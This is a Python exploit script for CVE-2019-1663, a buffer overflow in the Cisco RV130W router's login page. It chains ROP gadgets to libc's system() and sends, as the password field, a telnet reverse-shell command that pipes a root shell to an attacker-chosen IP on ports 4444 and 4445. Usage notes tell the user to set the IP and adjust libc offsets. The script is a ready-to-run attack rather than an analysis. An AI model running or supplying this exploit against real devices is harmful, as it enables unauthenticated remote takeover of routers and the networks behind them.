#!/usr/bin/env python3
"""
Exploit : CVE-2019-1663
CVSS : 9.8 CRITICAL
Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Target : Cisco RV130W Wireless-N Multifunction VPN Router
Author : KylVGoi
Usage : To use this exploit, update the IP address in the telnet commands.
Note : This script was developed on an emulated router. You may need to adjust the libc offsets.
"""
import struct
import requests

libc_base = 0x402bb000
gadget_1_offset = 0x00005c39 # pop {r3, r4, r6, r7, pc};
gadget_2_offset = 0x00037884 # mov r0, sp; blx r3;
system_offset = 0x4d144
payload_len = 446

PAYLOAD = b"A" * payload_len


PAYLOAD += struct.pack("<I", libc_base + gadget_1_offset)
PAYLOAD += struct.pack("<I", libc_base + system_offset)
PAYLOAD += b"HACK" # JUNK (r4 from pop)
PAYLOAD += b"THIS" # JUNK (r6 from pop)
PAYLOAD += b"SHIT" # JUNK (r7 from pop)
PAYLOAD += struct.pack("<I", libc_base + gadget_2_offset)
# ...
PAYLOAD += b"telnet <IP> 4444 | /bin/sh | telnet <IP> 4445;#" 
# reverse shell (stdin | shell | stdout)

def exploit(target_url, payload):
    data = {
            "submit_button": "login",
            "submit_type": "",
            "gui_action": "",
            "wait_time": "0",
            "change_action": "",
            "enc": "1",
            "user": "please-make-me-root",
            "pwd": payload,
            "sel_lang": "EN"
        }
    try:
        print(f"\nEnvoi payload ")
        response = requests.post(target_url, data=data, timeout=5)
        print(f"Status: {response.status_code}")

    except requests.exceptions.RequestException as e:
        print(f"Erreur ou timeout : {e}")



if __name__ == "__main__":
    exploit("http://vpn.contoso.com/login.cgi", PAYLOAD)